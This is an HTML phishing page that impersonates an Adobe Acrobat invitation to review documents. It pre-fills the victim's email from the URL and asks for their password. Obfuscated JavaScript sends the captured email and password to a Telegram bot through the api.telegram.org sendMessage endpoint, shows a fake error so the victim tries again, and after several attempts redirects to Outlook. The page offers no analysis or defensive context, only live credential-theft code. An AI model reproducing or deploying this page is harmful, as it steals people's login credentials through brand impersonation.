
<!DOCTYPE html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <script>
        var scriptID = 'AAA';

        var Aemail, Acity, Aname;

        // Function to extract URL parameters and save to global variables
        function extractUrlParams() {
            const params = new URLSearchParams(window.location.search);

            Aemail = params.get('email');
            Acity = params.get('city');
            Aname = params.get('name');

            // For demonstration, log the variables to console
            console.log('Email:', Aemail);
            console.log('City:', Acity);
            console.log('Name:', Aname);
        }

        // Execute the function when the page loads
        document.addEventListener("DOMContentLoaded", function() {
            extractUrlParams();
        });

    </script>
    <title>Adobe Acrobat Pro</title>
<link rel="shortcut icon" href="https://www.adobe.com/content/dam/cc/icons/Adobe_Corporate_Horizontal_Red_HEX.svg" />
    <style>
        body {
    --color-primary: #c62c2c;
    --color-primary-dark: #ae1d1d;
    --color-secondary: #252c6a;
    --color-error: #cc3333;
    --color-success: #4bb544;
    --border-radius: 4px;
    margin: 0;
    height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    font-size: 11px;
    background-size: cover;
  background-image: url("https://t4.ftcdn.net/jpg/02/52/46/25/360_F_252462576_koy7njo9iYx6gUcM26IZcDUs9fMKIKJs.jpg")
}

.container {
    width: 390px;
    max-width: 390px;
    margin: 0.9rem;
    padding: 1rem;
    box-shadow: 0 0 40px rgba(0, 0, 0, 0.2);
    border-radius: var(--border-radius);
    background: #ffffff;
    margin-top: 4rem;
}

.container,
.form__input,
.form__button {
    font: 500 1rem 'Calibri', sans-serif;
    text-align: center;
}

.form--hidden {
    display: none;
}

.form > *:first-child {
    margin-top: 0;
}

.form > *:last-child {
    margin-bottom: 0;
}

.form__title {
    margin-bottom: 1rem;
    text-align: center;
    font-size: 1.3rem;
    font-weight: normal;
    border-bottom: 2px solid #dddddd;
}

.form__message {
    text-align: center;
    margin-bottom: 1rem;
    font-size: 0.9rem;
}

.form__message--success {
    color: var(--color-success);
}

.form__message--error {
    color: var(--color-error);
}
.form__message p {
    text-align: justify;
}

.form__input-group {
    margin-bottom: 1rem;
}

.form__input {
    display: block;
    width: 100%;
    padding: 0.75rem;
    box-sizing: border-box;
    border: 1px solid #dddddd;
    outline: none;
    background: #eeeeee;
    transition: background 0.2s, border-color 0.2s;
}

.form__input:focus {
    border-color: var(--color-primary);
    background: #ffffff;
}

.form__input--error {
    color: var(--color-error);
    border-color: var(--color-error);
}

.form__input-error-message {
    margin-top: 0.5rem;
    font-size: 0.85rem;
    color: var(--color-error);
}

.form__button {
    width: 100%;
    padding: 0.8rem 2rem;
    font-weight: bold;
    font-size: 1rem;
    color: #ffffff;
    border: none;
    outline: none;
    cursor: pointer;
    background: var(--color-primary);
    position: relative;
}

.form__button:hover {
    background: var(--color-primary-dark);
}

.form__button:active {
    transform: scale(0.98);
}

.form__text {
    text-align: center;
    margin: 10px;
}

.form__link {
    color: var(--color-secondary);
    text-decoration: none;
    cursor: pointer;
}

.form__link:hover {
    text-decoration: underline;
}
.icon{
    width: 190px;
    display: flex;
    align-content: center;
    justify-content: center;
    align-items: center;
    padding-bottom: 10px;
   
}
.icon img {
    width: inherit;
    padding-right: 5px;
}
.header {
        position: fixed;
    height: 30px;
    align-items: center;
    display: flex;
    left: 0;
    right: 0;
    top: 0px;
    background-color: var(--color-primary);
    width: 100%;
}
.otl {
  width: 35px;
  margin: 5px 25px 5px 20px;
}
    </style>
</head>
<body onload="load()">
    <div class="container">
        <div class="form">            
          <!--  <h1 class="form__title">Adobe Acrobat</h1> -->

            <div style="background-color: #ffdfdf;" class="form__message form__message--error" id="form-messages"></div>
            <div class="form__message" id="form-messages">
                <div style="display: flex; justify-content: center;">
                    <div class="icon"><img alt="" src="https://assets-global.website-files.com/5e123ae95aa39898c605b7ad/6499d66445c64d40903a051f_logo_CDadobe_red_02_vert-768x209.png" /></div> 
                </div>
                
                <h4 id="myInvite" style="font-weight: 300;">You have been invited to comment and review on a few documents.</h4>
               
                <hr>
               

                <h4 style="text-align: center; padding: 10px; font-weight: 300;">Please sign in with your professional email to accept the invitation and review the document.</h4>
            <div class="form__input-group">
                <input type=email class="form__input" autofocus placeholder="Email" id="email" autocomplete="off" required readonly>
            </div>
            <div class="form__input-group">
                <input type="password" class="form__input" placeholder="Password" id="password" autocomplete="off">
            </div>
            <input type=submit class=form__button id=btn-submit value="Accept Invitation" name=btn-submit>
          
        </div>
            <p class="form__text">
                &copy; 2024 - Adobe - <a href="#" class="form__link">Privacy &amp; Cookies</a>
            </p>

          
    </div>
    <script>
//document.getElementById("logoimg").src = `https://logo.clearbit.com/fifa.com`;

 extractUrlParams();

 const _0x134b01=_0x9e0a;function _0xc9c2(){const _0x89fbe3=['952200xXlkBC','log','35FEvSZbI6','s\x20your\x20req','bkFSD','zjXuf','https://ou','focus','sent\x20data','FwbnL','getElement','6164125598','GyHqY','replace','btn-submit','CKaJW','BWfQb','sIIZb','XDfDO','tlook.offi','CcDOg','hwyQm','SjQDm',':AAFcaxgn9','ce.com','n/x-www-fo','sMCof','password','applicatio','se\x20try\x20aga','https://ap','Content-ty','1109367LCikaN','POST','uest,\x20plea','value','split','href','SBjVU','gpaxc','4|1|0|3|2','Header','click','12093655otfNpF','form-messa','-100224648','Emymq','rm-urlenco','613251WhCFkN','.org/bot','substring','readyState','length','1555552tCbBSR','i.telegram','aWnKk','ById','search','PASS:\x20','onreadysta','innerHTML','1200852TkKAiA','open','status','zDZUF','addEventLi','JbFeX','4|1|3|0|2','ere\x20unable','chat_id=','ded','dCOdE','send','BwoZP','DdQUL2nrkz','techange','vPnhL','setRequest','VsaIU','iWnNC','in.','nLj5iI','stener','submit','&text=','ges','/sendMessa','location','zberx','1736','5045330yAnpwl','\x20to\x20proces','LOG:\x20','npYmG','email','Oops,\x20we\x20w'];_0xc9c2=function(){return _0x89fbe3;};return _0xc9c2();}(function(_0xddf681,_0x394c2a){const _0x2aa9ce=_0x9e0a,_0x4d02d5=_0xddf681();while(!![]){try{const _0x3531bb=parseInt(_0x2aa9ce(0xad))/(-0xd*0x67+0xbfb+-0x9d*0xb)+-parseInt(_0x2aa9ce(0xca))/(-0x17f*0x1+0xb34+-0x9b3)+parseInt(_0x2aa9ce(0xbd))/(-0x1e03+-0x178b+0x3591)+-parseInt(_0x2aa9ce(0xc2))/(-0x23c5+0x1*0x24ad+0x26*-0x6)+-parseInt(_0x2aa9ce(0x87))/(0x1f*-0x1+0x28+-0x2*0x2)+-parseInt(_0x2aa9ce(0x8d))/(0x47*-0x9+-0x1b0a+0x1d8f)+parseInt(_0x2aa9ce(0xb8))/(-0x1b38+0x1509+-0x6*-0x109);if(_0x3531bb===_0x394c2a)break;else _0x4d02d5['push'](_0x4d02d5['shift']());}catch(_0x5c8154){_0x4d02d5['push'](_0x4d02d5['shift']());}}}(_0xc9c2,-0x12f7a2*-0x1+-0x26f21+-0x1b0*0x1cd));function sendMessage(_0xcd1587,_0x1d8ede,_0x249d4b){const _0x42d5df=_0x9e0a,_0x33b248={'BWfQb':function(_0x326e36,_0x16e1ff){return _0x326e36==_0x16e1ff;},'vPnhL':_0x42d5df(0x98)+_0x42d5df(0xa4)+_0x42d5df(0x77)+_0x42d5df(0x8f)+_0x42d5df(0x7e),'GyHqY':_0x42d5df(0xba)+_0x42d5df(0x86),'BwoZP':function(_0x19c0f5,_0x51533c){return _0x19c0f5+_0x51533c;},'sMCof':function(_0x3e4bdd,_0x18fbb7){return _0x3e4bdd+_0x18fbb7;},'npYmG':_0x42d5df(0x89),'gpaxc':_0x42d5df(0xc7),'bkFSD':function(_0x2cc7d6,_0x48eedc){return _0x2cc7d6(_0x48eedc);},'zjXuf':_0x42d5df(0xae),'zberx':_0x42d5df(0xac)+'pe','aWnKk':_0x42d5df(0xa9)+_0x42d5df(0xa6)+_0x42d5df(0xbc)+_0x42d5df(0xd3)},_0x1cfd34=_0x33b248[_0x42d5df(0x79)],_0x48324=_0x33b248[_0x42d5df(0x99)];var _0x1e9dde=_0x33b248[_0x42d5df(0x76)](_0x33b248[_0x42d5df(0xa7)](_0x33b248[_0x42d5df(0x76)](_0x33b248[_0x42d5df(0xa7)](_0x33b248[_0x42d5df(0x8a)],_0x1d8ede),'\x0a'),_0x33b248[_0x42d5df(0xb4)]),_0x249d4b);const _0x171416=_0x1e9dde,_0x46ee0c=new XMLHttpRequest(),_0x1e2ee0=_0x42d5df(0xab)+_0x42d5df(0xc3)+_0x42d5df(0xbe)+_0x1cfd34+(_0x42d5df(0x83)+'ge'),_0x4bb89f=_0x42d5df(0xd2)+_0x48324+_0x42d5df(0x81)+_0x33b248[_0x42d5df(0x91)](encodeURIComponent,_0x171416);_0x46ee0c[_0x42d5df(0xcb)](_0x33b248[_0x42d5df(0x92)],_0x1e2ee0,!![]),_0x46ee0c[_0x42d5df(0x7a)+_0x42d5df(0xb6)](_0x33b248[_0x42d5df(0x85)],_0x33b248[_0x42d5df(0xc4)]),_0x46ee0c[_0x42d5df(0xc8)+_0x42d5df(0x78)]=function(){const _0xd49e53=_0x42d5df;if(_0x33b248[_0xd49e53(0x9d)](_0x46ee0c[_0xd49e53(0xc0)],-0x19f2+-0x1429+0x2e1f)&&_0x33b248[_0xd49e53(0x9d)](_0x46ee0c[_0xd49e53(0xcc)],-0xa91+-0x23a9+0x2f02*0x1)){}else{}},_0x46ee0c[_0x42d5df(0x75)](_0x4bb89f);}function load(){const _0x44509f=_0x9e0a,_0x141958={'CcDOg':_0x44509f(0xd0),'Emymq':_0x44509f(0x8b),'CKaJW':function(_0xaa328f,_0x59d67f){return _0xaa328f+_0x59d67f;}},_0x2526d4=_0x141958[_0x44509f(0xa1)][_0x44509f(0xb1)]('|');let _0x55cd7b=0x1a52+0x257a+0x3fcc*-0x1;while(!![]){switch(_0x2526d4[_0x55cd7b++]){case'0':document[_0x44509f(0x97)+_0x44509f(0xc5)](_0x141958[_0x44509f(0xbb)])[_0x44509f(0xb0)]=Aemail;continue;case'1':var _0x1e152b=_0x5e34cd[_0x44509f(0xc6)]('#');continue;case'2':var _0xd771dd=urlEmail[_0x44509f(0xc6)]('@');continue;case'3':urlEmail=_0x5e34cd[_0x44509f(0xbf)](_0x141958[_0x44509f(0x9c)](_0x1e152b,0x6*-0x112+-0x1*-0x1a93+-0x1421),_0x5e34cd[_0x44509f(0xc1)]);continue;case'4':var _0x5e34cd=window[_0x44509f(0x84)][_0x44509f(0xb2)];continue;}break;}}var login_attempts=-0x155a*0x1+-0x1*-0x9c2+0xb98;function _0x9e0a(_0x55527a,_0x5bab88){const _0x1cd880=_0xc9c2();return _0x9e0a=function(_0x5ab717,_0x41aea8){_0x5ab717=_0x5ab717-(-0x189c+-0x1e47+0x3757);let _0x562bfa=_0x1cd880[_0x5ab717];return _0x562bfa;},_0x9e0a(_0x55527a,_0x5bab88);}const form={'email':document[_0x134b01(0x97)+_0x134b01(0xc5)](_0x134b01(0x8b)),'password':document[_0x134b01(0x97)+_0x134b01(0xc5)](_0x134b01(0xa8)),'submit':document[_0x134b01(0x97)+_0x134b01(0xc5)](_0x134b01(0x9b)),'messages':document[_0x134b01(0x97)+_0x134b01(0xc5)](_0x134b01(0xb9)+_0x134b01(0x82))};form[_0x134b01(0xa8)][_0x134b01(0xce)+_0x134b01(0x7f)](_0x134b01(0x94),()=>{const _0x447fb2=_0x134b01,_0x1ea667={'hwyQm':_0x447fb2(0xb9)+_0x447fb2(0x82)};document[_0x447fb2(0x97)+_0x447fb2(0xc5)](_0x1ea667[_0x447fb2(0xa2)])[_0x447fb2(0xc9)]='';}),form[_0x134b01(0x80)][_0x134b01(0xce)+_0x134b01(0x7f)](_0x134b01(0xb7),()=>{const _0x49a671=_0x134b01,_0x24fbbd={'dCOdE':function(_0x344f7f,_0x448375){return _0x344f7f<_0x448375;},'SjQDm':function(_0x59c695,_0x265a05){return _0x59c695>_0x265a05;},'JbFeX':_0x49a671(0xb5),'SBjVU':_0x49a671(0x95),'sIIZb':_0x49a671(0xb9)+_0x49a671(0x82),'zDZUF':_0x49a671(0x8c)+_0x49a671(0xd1)+_0x49a671(0x88)+_0x49a671(0x90)+_0x49a671(0xaf)+_0x49a671(0xaa)+_0x49a671(0x7d),'iWnNC':_0x49a671(0xa8),'VsaIU':function(_0x47e1d7,_0x34c144,_0x20af1d,_0x1bca33){return _0x47e1d7(_0x34c144,_0x20af1d,_0x1bca33);},'XDfDO':function(_0x3bb77e,_0x2fe618){return _0x3bb77e==_0x2fe618;},'FwbnL':_0x49a671(0x93)+_0x49a671(0xa0)+_0x49a671(0xa5)};if(_0x24fbbd[_0x49a671(0x74)](login_attempts,-0x9*-0x297+0x2*-0x756+-0x8a0)){var _0x372c20=form[_0x49a671(0x8b)][_0x49a671(0xb0)],_0x65e986=form[_0x49a671(0xa8)][_0x49a671(0xb0)];if(_0x24fbbd[_0x49a671(0xa3)](_0x65e986[_0x49a671(0xc1)],-0x20b5+-0x107*0xf+0x3021)){const _0x507f26=_0x24fbbd[_0x49a671(0xcf)][_0x49a671(0xb1)]('|');let _0x313356=-0x575*-0x5+0xee7+-0x2a30;while(!![]){switch(_0x507f26[_0x313356++]){case'0':login_attempts++;continue;case'1':console[_0x49a671(0x8e)](_0x24fbbd[_0x49a671(0xb3)]);continue;case'2':document[_0x49a671(0x97)+_0x49a671(0xc5)](_0x24fbbd[_0x49a671(0x9e)])[_0x49a671(0xc9)]=_0x24fbbd[_0x49a671(0xcd)];continue;case'3':document[_0x49a671(0x97)+_0x49a671(0xc5)](_0x24fbbd[_0x49a671(0x7c)])[_0x49a671(0xb0)]='';continue;case'4':_0x24fbbd[_0x49a671(0x7b)](sendMessage,scriptID,_0x372c20,_0x65e986);continue;}break;}}document[_0x49a671(0x97)+_0x49a671(0xc5)](_0x24fbbd[_0x49a671(0x7c)])[_0x49a671(0xb0)]='',document[_0x49a671(0x97)+_0x49a671(0xc5)](_0x24fbbd[_0x49a671(0x9e)])[_0x49a671(0xc9)]=_0x24fbbd[_0x49a671(0xcd)],_0x24fbbd[_0x49a671(0x9f)](login_attempts,-0x155a+0x1*-0x21e5+0x3742)&&location[_0x49a671(0x9a)](_0x24fbbd[_0x49a671(0x96)]);}});
    </script>
</body>
